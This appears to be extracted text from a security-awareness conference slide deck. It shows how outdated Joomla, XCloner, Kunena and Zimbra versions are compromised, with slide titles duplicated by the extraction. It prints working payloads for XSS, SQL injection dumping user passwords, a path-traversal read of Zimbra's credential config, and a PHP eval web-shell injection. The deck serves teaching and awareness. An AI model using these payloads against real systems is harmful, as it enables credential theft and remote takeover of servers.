Download - The Web You Thought You Knew
The Web you thought you The Web you thought you knewknew
By Munir Njiru and Ruth Macharia
● Most people don't think its relevant , why? – you either can't comprehend someone
attacking you.'
– you have no idea about attacks
Web Security Please?Web Security Please?
● Glad I got your attention.. ● There are guys that have tried to open
your eyes by creating awareness of this, they are OWASP (Open Web Application Security Project)
● They have ten categories for these attacks but I will not bore you with all that talk so get more info here: https://www.owasp.org/index.php/Top_10_2013-Top_10
OWASP top 10OWASP top 10
The web can’t be covered in a day , Bear with this it’s a tip of the iceberg but relevant. If we could cover it You’d feel this:
Don’t be illusioned!!Don’t be illusioned!!
Why should I care what could these breaches possibly do you ask?
Well you could lose your webutation You could lose cash You could have your secrets exposed And for admins you could involuntarily sign a power
sharing agreement, and we know you don't like that.
This list is not comprehensive if you are holding your breath keep holding it :)
So what’s the worst?So what’s the worst?
You shall see the worst and jumbled stuff on screen when an attack is carried out but don’t panic when you see all the technical jargon on screen just look at the results from the jargon and the answer to what was happening shall
come.
DisclaimerDisclaimer
Let us tell this as a story, you see how slowly people fit in the OWASP Top 10, maybe not everywhere but enough places to render you done for:
I made a Mistake How?I made a Mistake How?
So the IT Manager had a proposition of giving a dynamic site with the technology of today and a robust mail server for communication. Here are his specifications :
Dynamic content management on a robust platform (Joomla)
Backup system based on XCloner
Forum Based on Kunena to enable interaction for staff and clients
Zimbra Server for Mail Handling
I made a Mistake How?I made a Mistake How?
He missed however to check the security of the proposed system and the version information led to this sites demise.
Let me save you the headache of his version information- recon was spoken of well it got us this: - Joomla 1.5.15
- Xcloner 2.1
- Kunena 1.6.1
- Zimbra 8.0.2
I made a Mistake How?I made a Mistake How?
Well this is the ability for an attacker to diss you using your browser.
It’s basically the ability to add code to what you see , and this code is not usually added in your best interest.
XSSXSS
Payload=> <script>alert("I said it was just an XSS what's the worst that could happen? \n Then the hackers at Africahackon went straight for my cookie jar and found all my secrets: \n\n" );</script>
Your Browser Dissed You!Your Browser Dissed You!
DemoDemo
Your Browser Dissed You!Your Browser Dissed You!
First of all you don’t need to go through a medicine class to get this.
In layman what it is the ability to sweet talk your
database so that it can give it up !!!
SQL InjectionSQL Injection
Payload => %' and 1=2) union select 1, concat(0x3a,username,0x3a,email,0x3a,0x3a,activation),concat(0x3a,username,0x3a,email,0x3a,password,0x3a,activation),'Super Administrator','email','2009-11-26 22:09:28','2009-11-26 22:09:28',62,1,1,0,0,0,1,15 from jos_users-- ;
I just saw my Name!!!!I just saw my Name!!!!
DemoDemo
I just saw my Name!!!!I just saw my Name!!!!
It's technically giving information to anyone ...
Payload=> task=info
Information DisclosureInformation Disclosure
DemoDemo
Information DisclosureInformation Disclosure
This is basically the ability to read files within the system..
If you are thinking big deal so what just chill you will be answered.
LFILFI
Waiiittt the mail tooo???Waiiittt the mail tooo???
Waiiittt the mail tooo???Waiiittt the mail tooo???
Payload=> res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
Waiiittt the mail tooo???Waiiittt the mail tooo???
DemoDemo
Waiiittt the mail tooo???Waiiittt the mail tooo???
To see this manually done without the script check our video to get the gist of
the background:
http://www.youtube.com/watch?v=ahJLYT8CLow
See it in Action!!!!See it in Action!!!!
Just when you thought we were done :D well you were warned , the web is wide but we will be winding up in a bit.
RCE - Its not "Regional Centers of Expertise", It's Remote Code Execution
RCERCE
Payload=> ?task=step2&output_url_pref=';+}+?>+<?php+eval($_GET['africahackon']);+?>&output_path=../../../../
What Just Happened???What Just Happened???
DemoDemo
What Just Happened???What Just Happened???
● This would all have been avoided if: – Data was validated on the platform
– The technology was investigated before being implemented.
RemediationRemediation
● Don't be ashamed to scratch your head after this; I would too its a lot of information.
QuestionsQuestions
Contact UsContact Us
THANK YOU